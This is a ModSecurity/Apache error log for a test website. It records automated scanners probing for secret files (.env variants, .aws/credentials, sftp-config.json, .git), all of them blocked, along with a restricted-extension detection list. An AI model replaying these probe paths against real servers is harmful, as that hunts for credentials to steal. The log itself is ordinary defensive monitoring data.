[Tue Jul 01 15:51:32.264567 2025] [:error] [pid 4183936] [client 93.123.109.101:41612] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGPn5EFBW4b-TGAsVCpfDQAAAAk"]
[Tue Jul 01 15:51:32.397079 2025] [:error] [pid 4183904] [client 93.123.109.101:41628] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aGPn5H9Fs1zXGDBiD_HG-AAAAAg"]
[Tue Jul 01 15:51:32.397323 2025] [:error] [pid 4183904] [client 93.123.109.101:41628] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aGPn5H9Fs1zXGDBiD_HG-AAAAAg"]
[Tue Jul 01 15:51:32.397495 2025] [:error] [pid 4183904] [client 93.123.109.101:41628] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aGPn5H9Fs1zXGDBiD_HG-AAAAAg"]
[Tue Jul 01 15:51:32.529329 2025] [:error] [pid 117960] [client 93.123.109.101:41630] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aGPn5E43XqPC2WIkbS3IAwAAAAI"]
[Tue Jul 01 15:51:32.529572 2025] [:error] [pid 117960] [client 93.123.109.101:41630] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aGPn5E43XqPC2WIkbS3IAwAAAAI"]
[Tue Jul 01 15:51:32.529742 2025] [:error] [pid 117960] [client 93.123.109.101:41630] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aGPn5E43XqPC2WIkbS3IAwAAAAI"]
[Tue Jul 01 15:51:33.160637 2025] [:error] [pid 4183833] [client 93.123.109.101:41688] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aGPn5TF7JWw87UMwoaOWkgAAAAc"]
[Tue Jul 01 15:51:33.160911 2025] [:error] [pid 4183833] [client 93.123.109.101:41688] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aGPn5TF7JWw87UMwoaOWkgAAAAc"]
[Tue Jul 01 15:51:33.161094 2025] [:error] [pid 4183833] [client 93.123.109.101:41688] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aGPn5TF7JWw87UMwoaOWkgAAAAc"]
[Tue Jul 01 15:51:33.262368 2025] [:error] [pid 4184244] [client 93.123.109.101:41696] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aGPn5TKFd6dwguokCxrAiwAAAAo"]
[Tue Jul 01 15:51:33.262613 2025] [:error] [pid 4184244] [client 93.123.109.101:41696] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aGPn5TKFd6dwguokCxrAiwAAAAo"]
[Tue Jul 01 15:51:33.262771 2025] [:error] [pid 4184244] [client 93.123.109.101:41696] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aGPn5TKFd6dwguokCxrAiwAAAAo"]
[Tue Jul 01 15:51:33.347398 2025] [:error] [pid 118085] [client 93.123.109.101:41700] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aGPn5dFNwEoyRpy3eAERCgAAAA4"]
[Tue Jul 01 15:51:33.347656 2025] [:error] [pid 118085] [client 93.123.109.101:41700] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aGPn5dFNwEoyRpy3eAERCgAAAA4"]
[Tue Jul 01 15:51:33.347810 2025] [:error] [pid 118085] [client 93.123.109.101:41700] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aGPn5dFNwEoyRpy3eAERCgAAAA4"]
[Sat Jul 05 03:05:12.450993 2025] [authz_core:error] [pid 945017] [client 34.162.109.42:53082] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 03:05:12.564948 2025] [authz_core:error] [pid 945017] [client 34.162.109.42:53082] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 06:00:25.155380 2025] [authz_core:error] [pid 945017] [client 34.162.137.142:52836] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 06:00:25.265294 2025] [authz_core:error] [pid 945017] [client 34.162.137.142:52836] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 11:54:09.176752 2025] [authz_core:error] [pid 945017] [client 34.162.10.19:57228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 11:54:09.286992 2025] [authz_core:error] [pid 945017] [client 34.162.10.19:57228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 16:29:53.573331 2025] [authz_core:error] [pid 945015] [client 34.162.75.1:46578] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 16:29:53.684364 2025] [authz_core:error] [pid 945015] [client 34.162.75.1:46578] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 22:28:53.577973 2025] [authz_core:error] [pid 945204] [client 34.162.88.27:60228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 05 22:28:53.688150 2025] [authz_core:error] [pid 945204] [client 34.162.88.27:60228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jul 06 00:10:08.327828 2025] [authz_core:error] [pid 964234] [client 34.162.91.215:52802] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jul 06 00:10:08.438059 2025] [authz_core:error] [pid 964234] [client 34.162.91.215:52802] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jul 06 07:10:15.135180 2025] [authz_core:error] [pid 971499] [client 34.162.172.120:44622] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jul 06 07:10:15.244682 2025] [authz_core:error] [pid 971499] [client 34.162.172.120:44622] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jul 06 19:13:41.107037 2025] [:error] [pid 968044] [client 3.17.255.71:49867] [client 3.17.255.71] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aGquxRcrdhACkz4kNY6eyQAAAAU"]
[Sun Jul 06 19:13:41.108486 2025] [:error] [pid 968044] [client 3.17.255.71:49867] [client 3.17.255.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aGquxRcrdhACkz4kNY6eyQAAAAU"]
[Sun Jul 06 19:13:41.108707 2025] [:error] [pid 968044] [client 3.17.255.71:49867] [client 3.17.255.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aGquxRcrdhACkz4kNY6eyQAAAAU"]
[Mon Jul 07 17:09:10.009389 2025] [authz_core:error] [pid 989741] [client 143.198.191.145:35568] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 07 17:36:41.972488 2025] [authz_core:error] [pid 989737] [client 34.16.156.241:49378] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 07 19:32:55.233286 2025] [:error] [pid 1003387] [client 199.193.116.136:24719] [client 199.193.116.136] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aGwEx4-_kyLSy_E45kSgiQAAAAc"]
[Mon Jul 07 19:32:55.233884 2025] [:error] [pid 1003387] [client 199.193.116.136:24719] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aGwEx4-_kyLSy_E45kSgiQAAAAc"]
[Mon Jul 07 19:32:55.234078 2025] [:error] [pid 1003387] [client 199.193.116.136:24719] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aGwEx4-_kyLSy_E45kSgiQAAAAc"]
[Mon Jul 07 19:34:51.136452 2025] [:error] [pid 989738] [client 199.193.116.136:10888] [client 199.193.116.136] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aGwFO_LL4X_lPakZ_8vzmgAAAAI"]
[Mon Jul 07 19:34:51.136830 2025] [:error] [pid 989738] [client 199.193.116.136:10888] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aGwFO_LL4X_lPakZ_8vzmgAAAAI"]
[Mon Jul 07 19:34:51.137038 2025] [:error] [pid 989738] [client 199.193.116.136:10888] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aGwFO_LL4X_lPakZ_8vzmgAAAAI"]
[Mon Jul 07 19:36:34.971749 2025] [authz_core:error] [pid 989741] [client 199.193.116.136:60108] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 07 19:38:47.070902 2025] [:error] [pid 1003386] [client 199.193.116.136:2952] [client 199.193.116.136] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aGwGJ04IAI8VKzwq5qfmDQAAAAQ"]
[Mon Jul 07 19:38:47.071172 2025] [:error] [pid 1003386] [client 199.193.116.136:2952] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aGwGJ04IAI8VKzwq5qfmDQAAAAQ"]
[Mon Jul 07 19:38:47.071338 2025] [:error] [pid 1003386] [client 199.193.116.136:2952] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aGwGJ04IAI8VKzwq5qfmDQAAAAQ"]
[Mon Jul 07 19:39:56.191687 2025] [:error] [pid 993812] [client 199.193.116.136:18939] [client 199.193.116.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGwGbITKtlJ1TPZqAJET6QAAAAk"]
[Mon Jul 07 19:39:56.191971 2025] [:error] [pid 993812] [client 199.193.116.136:18939] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGwGbITKtlJ1TPZqAJET6QAAAAk"]
[Mon Jul 07 19:39:56.192169 2025] [:error] [pid 993812] [client 199.193.116.136:18939] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aGwGbITKtlJ1TPZqAJET6QAAAAk"]
[Mon Jul 07 19:40:21.784476 2025] [:error] [pid 989738] [client 199.193.116.136:43388] [client 199.193.116.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGwGhfLL4X_lPakZ_8vzmwAAAAI"]
[Mon Jul 07 19:40:21.784774 2025] [:error] [pid 989738] [client 199.193.116.136:43388] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGwGhfLL4X_lPakZ_8vzmwAAAAI"]
[Mon Jul 07 19:40:21.784951 2025] [:error] [pid 989738] [client 199.193.116.136:43388] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aGwGhfLL4X_lPakZ_8vzmwAAAAI"]
[Mon Jul 07 19:41:46.616089 2025] [:error] [pid 999310] [client 199.193.116.136:16353] [client 199.193.116.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aGwG2h317rZLcfc1S5TakAAAAA4"]
[Mon Jul 07 19:41:46.616369 2025] [:error] [pid 999310] [client 199.193.116.136:16353] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aGwG2h317rZLcfc1S5TakAAAAA4"]
